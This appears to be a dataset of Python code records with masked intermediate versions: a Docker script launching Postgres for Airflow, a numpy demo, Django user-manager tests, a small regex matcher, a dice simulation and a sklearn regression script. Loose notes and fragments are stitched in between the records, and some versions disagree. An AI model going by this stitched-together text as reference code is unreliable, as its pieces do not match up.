{ "blob_id": "a5c9ff1fe250310216e2eaa7a6ff5cc76fc10f94", "index": 4324, "step-1": "<mask token>\n", "step-2": "<mask token>\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, format=\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.DEBUG)\n client = docker.from_env()\n logging.info(str([x.name for x in client.volumes.list()]))\n if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:\n client.volumes.create('airflow_pg_data')\n logging.info(str([x.name for x in client.containers.list()]))\n if 'airflow_pg' not in [x.name for x in client.containers.list()]:\n pg = client.containers.run(image='postgres', name='airflow_pg',\n auto_remove=True, detach=True, environment={'POSTGRES_PASSWORD':\n 'airflow', 'POSTGRES_USER': 'airflow', 'PGDATA':\n '/airflow/data'}, volumes={'airflow_pg_data': {'bind':\n '/airflow/data', 'mode': 'rw'}}, ports={'5432/tcp': 5432})\n", "step-3": "import docker\nimport logging\nimport sys\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, format=\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.DEBUG)\n client = docker.from_env()\n logging.info(str([x.name for x in client.volumes.list()]))\n if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:\n client.volumes.create('airflow_pg_data')\n logging.info(str([x.name for x in client.containers.list()]))\n if 'airflow_pg' not in [x.name for x in client.containers.list()]:\n pg = client.containers.run(image='postgres', name='airflow_pg',\n auto_remove=True, detach=True, environment={'POSTGRES_PASSWORD':\n 'airflow', 'POSTGRES_USER': 'airflow', 'PGDATA':\n '/airflow/data'}, volumes={'airflow_pg_data': {'bind':\n '/airflow/data', 'mode': 'rw'}}, ports={'5432/tcp': 5432})\n", "step-4": "import docker\nimport logging\nimport sys\n\nif __name__ == '__main__':\n\n # setting up logger\n logging.basicConfig(stream=sys.stdout,\n format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.DEBUG)\n\n # get the docker client\n client = docker.from_env()\n\n # list out docker volumes\n logging.info(str([x.name for x in client.volumes.list()]))\n\n # Check if airflow backend volume is created or not\n # if the volume is not created then create it\n if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:\n client.volumes.create('airflow_pg_data')\n\n # kill container if it is already running\n logging.info(str([x.name for x in client.containers.list()]))\n if 'airflow_pg' not in [x.name for x in client.containers.list()]:\n\n # launch postgres backend\n pg = client.containers.run(image='postgres',\n name='airflow_pg',\n auto_remove=True,\n detach=True,\n environment={\n 'POSTGRES_PASSWORD': 'airflow',\n 'POSTGRES_USER': 'airflow',\n 'PGDATA': '/airflow/data'\n },\n volumes={'airflow_pg_data': {'bind': '/airflow/data', 'mode': 'rw'}},\n ports={'5432/tcp': 5432}\n )\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
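One caveat for the docker record above: client.containers.list() returns only running containers by default, so a stopped airflow_pg container would go undetected and the subsequent run would fail on a name clash. A sketch of a stricter existence check:

import docker

client = docker.from_env()
# all=True also includes stopped containers
existing = {c.name for c in client.containers.list(all=True)}
if 'airflow_pg' not in existing:
    print('safe to launch the postgres backend')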
import numpy as np

mydict = {}
mylist0 = np.array([1, 2, 3, 4, 5])
mylist1 = np.array([2, 3, 4, 5, 6])
print(mydict)
print(mylist0)
print(mylist1)

for c in ('0', '1'):
    if c in mydict:
        mydict[c] += mylist0
    else:
        # store a copy: assigning mylist0 itself would make both keys
        # alias the same array, so later in-place += would mutate it twice
        mydict[c] = mylist0.copy()
print(mydict)

for c in ('0', '1'):
    if c in mydict:
        mydict[c] += mylist1
    else:
        mydict[c] = mylist1.copy()
print(mydict)
normal
{ "blob_id": "6e5b8be6182f39f185f4547f0abd84a4e404bf34", "index": 1861, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(mydict)\nprint(mylist0)\nprint(mylist1)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist0\n else:\n mydict[c] = mylist0\nprint(mydict)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist1\n else:\n mydict[c] = mylist1\nprint(mydict)\n", "step-3": "<mask token>\nmydict = {}\nmylist0 = np.array([1, 2, 3, 4, 5])\nmylist1 = np.array([2, 3, 4, 5, 6])\nprint(mydict)\nprint(mylist0)\nprint(mylist1)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist0\n else:\n mydict[c] = mylist0\nprint(mydict)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist1\n else:\n mydict[c] = mylist1\nprint(mydict)\n", "step-4": "import numpy as np\nmydict = {}\nmylist0 = np.array([1, 2, 3, 4, 5])\nmylist1 = np.array([2, 3, 4, 5, 6])\nprint(mydict)\nprint(mylist0)\nprint(mylist1)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist0\n else:\n mydict[c] = mylist0\nprint(mydict)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist1\n else:\n mydict[c] = mylist1\nprint(mydict)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
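In the NumPy record above, binding the same array to several dict keys would make every key alias one buffer, so an in-place += mutates them all at once; that is why fresh copies are stored. A minimal demonstration of the pitfall:

import numpy as np

a = np.array([1, 2, 3])
d = {'0': a, '1': a}   # both keys reference the same underlying buffer
d['0'] += 10           # in-place update mutates that shared buffer
print(d['1'])          # [11 12 13] even though only '0' was touched
print(a)               # [11 12 13] -- the source array changed as well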
# -*- coding: utf-8 -*- from __future__ import unicode_literals, absolute_import from datetime import datetime try: from unittest.mock import patch except ImportError: from mock import patch import pytest from django.test import TestCase try: from django.test import override_settings except ImportError: from django.test.utils import override_settings from django.utils import timezone from custom_email_user.models import EmailUser from custom_email_user.managers import EmailUserManager fake_now = datetime(2015, 9, 10) @override_settings(USE_TZ=False) class TestEmailUserManager(TestCase): def setUp(self): self.email = '[email protected]' self.password = 'default' def test_private_create_user_without_email(self): """ Test that EmailUser.objects._create_user without email raise an ValueError exception """ with pytest.raises(ValueError) as exinfo: EmailUser.objects._create_user(None, None, False, False) self.assertIn('email must be set', str(exinfo.value)) @patch.object(timezone, 'now', return_value=fake_now) def test_private_create_user_its_ok(self, mock_now): user = EmailUser.objects._create_user(self.email, self.password, True, False) self.assertTrue(isinstance(user, EmailUser)) self.assertIsNotNone(user.pk) self.assertEqual(user.email, self.email) self.assertEqual(user.date_joined, fake_now) self.assertEqual(user.last_login, fake_now) self.assertTrue(user.is_staff) self.assertTrue(user.is_active) self.assertFalse(user.is_superuser) self.assertTrue(user.check_password(self.password)) def test_private_create_user_with_wrong_email(self): with pytest.raises(ValueError) as exinfo: EmailUser.objects._create_user('wrong@example', None, False, False) self.assertIn('email must be a valid email', str(exinfo.value)) @patch.object(EmailUserManager, '_create_user') def test_create_user_call_private_create_user_without_staff( self, mock_create_user): EmailUser.objects.create_user(self.email, self.password) mock_create_user.assert_called_once_with( self.email, self.password, False, False) @patch.object(EmailUserManager, '_create_user') def test_create_user_call_private_create_user_with_staff( self, mock_create_user): EmailUser.objects.create_user(self.email, self.password, True) mock_create_user.assert_called_once_with( self.email, self.password, True, False) @patch.object(EmailUserManager, '_create_user') def test_create_superuser_call_private_create_user(self, mock_create_user): EmailUser.objects.create_superuser(self.email, self.password) mock_create_user.assert_called_once_with( self.email, self.password, True, True)
normal
{ "blob_id": "71f9d9d7973809654db3ea613073f2d431f2d65f", "index": 1510, "step-1": "<mask token>\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n <mask token>\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-2": "<mask token>\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n<mask token>\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\n<mask token>\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', 
str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-3": "<mask token>\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n<mask token>\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\n<mask token>\nfake_now = datetime(2015, 9, 10)\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-4": "from __future__ import unicode_literals, absolute_import\nfrom datetime import datetime\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\nimport pytest\nfrom django.test import TestCase\ntry:\n 
from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\nfrom django.utils import timezone\nfrom custom_email_user.models import EmailUser\nfrom custom_email_user.managers import EmailUserManager\nfake_now = datetime(2015, 9, 10)\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nfrom datetime import datetime\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\nimport pytest\n\nfrom django.test import TestCase\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\nfrom django.utils import timezone\n\nfrom custom_email_user.models import EmailUser\nfrom custom_email_user.managers import EmailUserManager\n\nfake_now = datetime(2015, 9, 10)\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def 
test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password,\n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(\n self, mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(\n self.email, self.password, False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(\n self, mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(\n self.email, self.password, True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(\n self.email, self.password, True, True)\n\n\n", "step-ids": [ 7, 9, 10, 11, 12 ] }
[ 7, 9, 10, 11, 12 ]
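The test record above leans on patch.object to assert how a manager's private helper is invoked. A self-contained sketch of that pattern outside Django (the Greeter class is invented for illustration):

from unittest.mock import patch

class Greeter:
    def _format(self, name):
        return 'Hello, %s' % name

    def greet(self, name):
        return self._format(name)

with patch.object(Greeter, '_format') as mock_format:
    Greeter().greet('Ada')
    # the private helper was invoked exactly once with the expected argument
    mock_format.assert_called_once_with('Ada')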
def regexp_engine(pattern, letter):
    return pattern in ('', '.', letter)


def match_regexp(pattern, substring):
    if not pattern:  # an empty pattern always matches
        return True
    if substring:  # string not yet consumed: try the regexp engine
        if regexp_engine(pattern[0], substring[0]):  # current char matches
            return match_regexp(pattern[1:], substring[1:])
    return False  # mismatch, or the string ran out before the pattern did


def regexp(pattern, word):
    # a non-empty pattern can never match once the word is exhausted
    if not word and pattern:
        return False
    # try to match the pattern at the start of the word
    if not match_regexp(pattern, word):
        # no match here: retry with the word shifted one character right
        return regexp(pattern, word[1:])
    return True


print(regexp(*(input().split('|'))))
normal
{ "blob_id": "fbfc1749252cf8cbd9f8f72df268284d3e05d6dc", "index": 8024, "step-1": "<mask token>\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\n<mask token>\n", "step-2": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\n<mask token>\n", "step-3": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\ndef regexp(pattern, word):\n if not word and pattern:\n return False\n if not match_regexp(pattern, word):\n return regexp(pattern, word[1:])\n return True\n\n\n<mask token>\n", "step-4": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\ndef regexp(pattern, word):\n if not word and pattern:\n return False\n if not match_regexp(pattern, word):\n return regexp(pattern, word[1:])\n return True\n\n\nprint(regexp(*input().split('|')))\n", "step-5": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern: # pattern is empty always True\n return True\n if substring: # if string is not empty try the regexp engine\n if regexp_engine(pattern[0], substring[0]): # if reg and letter match\n return match_regexp(pattern[1:], substring[1:])\n return False # if reg and letter not match or string has been consumed\n\n\ndef regexp(pattern, word):\n # check if word is empty but catch the condition ' | '\n if not word and pattern:\n return False\n # if string is not empty so feeds params into regexp match\n if not match_regexp(pattern, word):\n # if regexp return False, try to cut the word\n return regexp(pattern, word[1:])\n return True\n\n\nprint(regexp(*(input().split('|'))))", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
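A few illustrative checks for the matcher above, assuming its three functions are in scope (inputs are normally supplied as pattern|word on stdin):

assert regexp('a.c', 'xabcz')   # '.' matches any one character; the match may start mid-word
assert not regexp('a.c', 'ac')  # '.' must consume exactly one character
assert regexp('', 'abc')        # an empty pattern matches anywhere
assert not regexp('abc', '')    # a non-empty pattern never matches an empty word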
''' You're playing casino dice game. You roll a die once. If you reroll, you earn the amount equal to the number on your second roll otherwise, you earn the amount equal to the number on your first roll. Assuming you adopt a profit-maximizing strategy, what would be the expected amount of money you would win? This question was asked in a data scientist interview at Tinder. ''' import numpy as np for threshold in range(1, 6): rolls = np.random.randint(1, 7, size=10**7) rerolls = np.random.randint(1, 7, size=10**7) avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls)) print(f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.')
normal
{ "blob_id": "e5d704541acd0f68a7885d7323118e1552e064c9", "index": 6170, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor threshold in range(1, 6):\n rolls = np.random.randint(1, 7, size=10 ** 7)\n rerolls = np.random.randint(1, 7, size=10 ** 7)\n avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls))\n print(\n f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.'\n )\n", "step-3": "<mask token>\nimport numpy as np\nfor threshold in range(1, 6):\n rolls = np.random.randint(1, 7, size=10 ** 7)\n rerolls = np.random.randint(1, 7, size=10 ** 7)\n avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls))\n print(\n f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.'\n )\n", "step-4": "'''\nYou're playing casino dice game. You roll a die once. If you reroll, you earn the amount equal to the number on your second roll otherwise, you earn the amount equal to the number on your first roll.\n\nAssuming you adopt a profit-maximizing strategy, what would be the expected amount of money you would win?\n\nThis question was asked in a data scientist interview at Tinder.\n'''\n\nimport numpy as np\n\nfor threshold in range(1, 6):\n rolls = np.random.randint(1, 7, size=10**7)\n rerolls = np.random.randint(1, 7, size=10**7)\n avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls))\n print(f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.')\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
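An analytic cross-check for the simulation above: a reroll is worth 3.5 in expectation, so the profit-maximizing strategy rerolls any first roll below 3.5, i.e. 1 through 3:

E_second = sum(range(1, 7)) / 6          # expected value of the second roll: 3.5
expected = [(sum(range(t + 1, 7)) + t * E_second) / 6  # keep rolls above t, reroll the rest
            for t in range(0, 7)]
print(max(expected))                     # 4.25, achieved by rerolling 1, 2 and 3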
import pandas as pd
from sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier
from sklearn.model_selection import train_test_split # Import train_test_split function
from sklearn import metrics #Import scikit-learn metrics module for accuracy calculation
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import BayesianRidge, LinearRegression
from sklearn import preprocessing
import os
import sys
import sklearn.metrics as mets
from review import set_metrics as set_metrics
from algo import Regression
import draw
#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution
#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/
#https://datascienceplus.com/keras-regression-based-neural-networks/

#xgboost
#random forest
#lstm
#rnn
#dec tree
#logistic regression
#ann
#naive bayes
#monte carlo

def read_atomic_data(path):
    if not path or not os.path.exists(path) or not os.path.isfile(path):
        print("To begin with, your path to data should be proper!")
        sys.exit(1)
    df = pd.read_csv(path)
    columns = df.columns.tolist()  # get the columns
    columns = columns[:-1]  # drop the last column
    df = pd.read_csv(path, usecols=columns)
    return df, columns

def get_dataset(df, columns):
    # use the columns parameter rather than the global `col`;
    # the last retained column, critical_temp, is the regression target
    X = df[columns[:-1]]
    y = df.critical_temp
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
    return (X_train, X_test, y_train, y_test)

df, col = read_atomic_data("unique_m.csv")
(X_train, X_test, y_train, y_test) = get_dataset(df, col)
X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
R = Regression(X_train, X_test, y_train, y_test)
scores = R.run()  # renamed from `dict` to avoid shadowing the builtin
print(scores)
draw.draw(scores, 'r2_score')
draw.draw(scores, 'max_error')
draw.draw(scores, 'explained_variance_score')
draw.draw(scores, 'mean_absolute_error')
draw.draw(scores, 'mean_squared_error')
draw.draw(scores, 'mean_squared_log_error')
draw.draw(scores, 'median_absolute_error')

sys.exit()
normal
{ "blob_id": "1e34087719f6fd0456d2722edbd0a7af68d37e4c", "index": 1577, "step-1": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n", "step-3": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\n<mask token>\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n", "step-4": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, 
